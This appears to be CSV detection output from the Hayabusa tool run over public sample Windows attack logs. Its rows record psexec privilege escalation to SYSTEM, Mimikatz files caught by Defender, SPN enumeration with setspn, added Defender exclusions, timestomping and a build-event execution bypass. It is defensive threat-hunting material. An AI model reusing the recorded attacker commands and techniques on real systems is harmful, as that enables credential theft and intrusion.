https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification 
Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool 
Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: 
C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: 
C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 
+09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify 
tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: 
LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.296 
+09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual 
Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-23 07:18:08.605 
